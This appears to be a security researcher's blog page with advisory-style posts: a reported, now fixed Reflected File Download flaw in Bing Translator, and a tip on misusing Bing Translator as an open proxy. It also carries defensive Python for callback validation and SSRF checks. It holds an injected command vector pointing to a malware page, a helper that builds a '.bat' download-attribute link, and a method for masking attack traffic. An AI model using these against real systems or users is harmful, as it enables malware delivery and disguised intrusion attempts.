David Sopas – Web Security Researcher

microsoft

19/01/16 Advisories

Bing Reflected File Download


While using the Bing online translator I noticed an XHR request in my browser that caught my attention:

http://www.bing.com/translator/LandingPage/GetDefinition?oncomplete=jQuery111207287312552798539_1444907172498&market=en&word=test&_=1444907172499

The value of the oncomplete parameter was reflected in the response body as a JSONP-style callback:

jQuery111207287312552798539_1444907172498();

As a security researcher I always try to find different ways to bypass security, especially anything related to Reflected File Download (RFD). So I tried to inject an RFD vector into the “oncomplete” parameter:

http://www.bing.com/translator/LandingPage/GetDefinition?oncomplete=start%20chrome%20davidsopas.com/poc/malware.htm

The injected value was reflected unfiltered:

start chrome davidsopas.com/poc/malware.htm();

Using the HTML5 download attribute, which lets a page the attacker controls pick the filename and extension under which the browser saves this reflected response, I built a proof of concept and sent a security report to Microsoft, which they fixed within a month.
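The root cause is a JSONP-style endpoint that copies the oncomplete parameter into the response body verbatim. The fix is to accept only a syntactically valid JavaScript identifier as the callback name and to pin the response's filename and content type so the browser cannot be talked into saving it as a script. The following is an added example and not Bing's code: a hardened handler in Python plus the shape of the download-attribute link the post refers to. Function names, the fixed filename "definition.json" and the "update.bat" filename in the usage are assumptions.

```python
import html
import json
import re
from typing import Dict, Tuple

# A JSONP callback must be a plain JavaScript identifier, optionally dotted (jQuery.fn.x).
# Spaces, slashes, quotes or "||" are rejected instead of being reflected.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")
MAX_CALLBACK_LEN = 128


def is_valid_callback(name: str) -> bool:
    """Return True only if `name` is safe to reflect as a JSONP callback."""
    return 0 < len(name) <= MAX_CALLBACK_LEN and CALLBACK_RE.fullmatch(name) is not None


def jsonp_response(callback: str, payload: dict) -> Tuple[int, Dict[str, str], str]:
    """
    Build (status, headers, body) for a JSONP endpoint in an RFD-resistant way:
    - the callback is validated and never reflected verbatim
    - Content-Disposition pins a harmless filename/extension, so a download="x.bat"
      link (or a /;/x.bat path trick) cannot rename the response into an executable
    - X-Content-Type-Options stops the browser from sniffing the body as another type
    - the body starts with a comment so it is not a valid file in other formats
    """
    if not is_valid_callback(callback):
        return 400, {"Content-Type": "text/plain; charset=utf-8"}, "invalid callback"
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        # fixed, harmless name; assumed here, the real endpoint would choose its own
        "Content-Disposition": 'attachment; filename="definition.json"',
        "X-Content-Type-Options": "nosniff",
    }
    body = "/**/" + callback + "(" + json.dumps(payload) + ");"
    return 200, headers, body


def rfd_download_link(url: str, filename: str) -> str:
    """
    Shape of the HTML5 download-attribute link used in RFD proofs of concept:
    the attacker's page proposes the filename (and thus the extension) the browser
    saves the reflected response under. The filename is an assumption.
    """
    return '<a href="%s" download="%s">click</a>' % (
        html.escape(url, quote=True),
        html.escape(filename, quote=True),
    )


if __name__ == "__main__":
    # The real jQuery callback from the post passes; the RFD vector does not.
    print(is_valid_callback("jQuery111207287312552798539_1444907172498"))
    print(is_valid_callback("start chrome davidsopas.com/poc/malware.htm"))
    print(jsonp_response("jQuery111207287312552798539_1444907172498", {"word": "test"}))
    print(rfd_download_link(
        "http://www.bing.com/translator/LandingPage/GetDefinition"
        "?oncomplete=start%20chrome%20davidsopas.com/poc/malware.htm",
        "update.bat",  # assumed filename for the PoC link
    ))
```

The identifier check alone closes the reflection used here; the Content-Disposition and nosniff headers are what keep a future bypass from turning into a downloadable executable, which is why RFD guidance recommends both even on endpoints that already validate the callback.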

With this report I was listed on the Security Researcher Acknowledgments for Microsoft Online Services for the fourth time.

07/01/16 Swag

Companies that I’ve helped improve their security


Google, Yahoo!, eBay, Microsoft, Etsy, Nexmo, Weebly, Edmodo, HackerOne, Desk, Adobe, ArubaNetworks, Condé Nast, Linkedin, Acunetix, SendGrid, Rocky Bytes, DepositFiles, Workable, MailChimp, Prestashop, HP, Kaspersky, OLX, RunKeeper, Tumblr, ESET, Symantec, Dowjones, Issuu, Jobs.cz, Alexa/Amazon, McAfee, Booking, AVG, Panda Security, Hootsuite, Circle, DoSomething, Zendesk, Nokia, 123 Contact Form, FoxyCart, Orkut, Segment.io and SilentCircle.

The other ones are private 🙂

16/10/15 Tips and Tricks

Free online proxy using Bing Translator


This method is already known for other services such as Google Translator.
I am not sure whether to consider this a security issue. Let's call it a special Bing Translator feature 🙂

Using the Bing Translator service anyone can use Microsoft's IP addresses as a proxy. Malicious users could use this as a platform to launch web attacks (XSS, SQL injection, etc.) with the requests appearing to come from Microsoft's address space, and users could also use the service to visit blocked sites.

Example:

http://www.microsofttranslator.com/bv.aspx?from=en&to=en&a=http://www.davidsopas.com/XXE

I noticed in my web server logs two requests made from 157.56.2.63 [msnbot-157-56-2-63.search.msn.com].

Another example that shows the IP address the target sees (ip.php just echoes $_SERVER["REMOTE_ADDR"]):

http://www.microsofttranslator.com/bv.aspx?from=en&to=en&a=http://www.davidsopas.com/poc/ip.php

I noticed that if you choose the same language for both sides of the pair (e.g. en-en, English to English), the translation is effectively skipped but the requested web content is still fetched and served from Microsoft's servers.

Google had the same issue in the past. They fixed the same-language pair part to prevent misuse of their translation service; now in Google Translator you always need to choose two different languages.
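The two observations above, that an identical language pair turns the service into a plain fetch proxy and that the fetch is made from the provider's own IP space, suggest what the server side of a "translate this page" endpoint should check before fetching. The following is an added example written for this post, not Microsoft's or Google's code: a request validator that refuses same-language pairs (the fix the post attributes to Google) and, going one step further than the post, refuses targets that resolve to non-public addresses, which is the SSRF variant of the same proxy misuse. The handler name, the injectable resolver and the sample addresses are assumptions.

```python
import ipaddress
import socket
from typing import Callable, Iterable, Tuple
from urllib.parse import urlsplit


def resolve_all(host: str) -> Iterable[str]:
    """Default resolver: every IPv4/IPv6 address the host resolves to (replaced in tests)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public_address(ip_text: str) -> bool:
    """True only for addresses a proxy fetch should be allowed to reach."""
    ip = ipaddress.ip_address(ip_text)
    return not (
        ip.is_private
        or ip.is_loopback
        or ip.is_link_local
        or ip.is_multicast
        or ip.is_reserved
        or ip.is_unspecified
    )


def check_translate_request(
    src: str,
    dst: str,
    target_url: str,
    resolver: Callable[[str], Iterable[str]] = resolve_all,
) -> Tuple[bool, str]:
    """
    Decide whether a "translate this URL" request may be fetched. Returns (allowed, reason).
    Refuses, in order:
      1. identical language pairs: nothing is translated, the request is only a proxy fetch
      2. anything that is not an http(s) URL with a hostname
      3. hostnames that resolve to any non-public address (loopback, RFC 1918,
         link-local such as cloud metadata endpoints), i.e. SSRF into the provider's network
    """
    if src.strip().lower() == dst.strip().lower():
        return False, "same-language pair: nothing to translate, request would only proxy the fetch"
    parts = urlsplit(target_url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False, "only http/https URLs with a hostname are fetched"
    try:
        addrs = list(resolver(parts.hostname))
    except OSError:
        return False, "hostname does not resolve"
    if not addrs or not all(is_public_address(a) for a in addrs):
        return False, "target resolves to a non-public address"
    return True, "ok"


if __name__ == "__main__":
    # Constructed resolver so the example runs offline; 93.184.216.34 is an assumed public address.
    fake_dns = lambda host: ["93.184.216.34"]
    print(check_translate_request("en", "en", "http://www.davidsopas.com/XXE", fake_dns))
    print(check_translate_request("en", "pt", "http://www.davidsopas.com/poc/ip.php", fake_dns))
    print(check_translate_request("en", "pt", "http://169.254.169.254/latest/meta-data/", lambda h: [h]))
```

Note what the same-language check does and does not buy: it removes the verbatim-fetch case, but a request with a real pair (en to pt) still fetches the target from the translator's addresses and still reaches it, so the destination check (together with rate limiting and a distinctive User-Agent, neither shown here) is what actually limits the proxy abuse the post describes. Resolving the host and checking every returned address also covers hostnames that point at internal addresses, not just literal IPs, though a resolver that answers differently on the real fetch (DNS rebinding) needs the fetch itself to pin the checked address.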
